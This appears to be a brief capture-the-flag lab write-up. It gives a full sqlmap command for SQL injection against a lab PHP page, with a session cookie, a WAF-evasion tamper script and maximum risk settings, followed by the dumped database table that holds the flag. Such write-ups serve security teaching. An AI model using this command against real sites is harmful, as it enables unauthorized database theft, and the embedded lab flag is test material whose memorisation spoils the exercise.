We used sqlmap tool for this problem.After running this script, 
script = "python sqlmap.py  --url="https://172.27.36.9:4431/index.php" --data="title=xyz"  -a  --cookie="PHPSESSID=d95pc726r90gh73t59u3fvrdq7" --tamper=space2comment --risk=3 --level=5 --batch"

we got the output:

Database: SQLite_masterdb
Table: movies
[6 entries]
+----------------------------------------+------------------------------------------+
| title                                  | director                                 |
+----------------------------------------+------------------------------------------+
| Nolan                                  | Dark Knight Rises                        |
| Brando                                 | Godfather                                |
| Freeman                                | Shawshank Redemption                     |
| Batman                                 | Nolan                                    |
| Avengers                               | Marvel                                   |
| asdasdhasuh767da8m787adnb65aad8665adb7 | cs628a{1b2f115958dccd45cdbd3c4b7545e088} | <---------- Flag
+----------------------------------------+------------------------------------------+
 
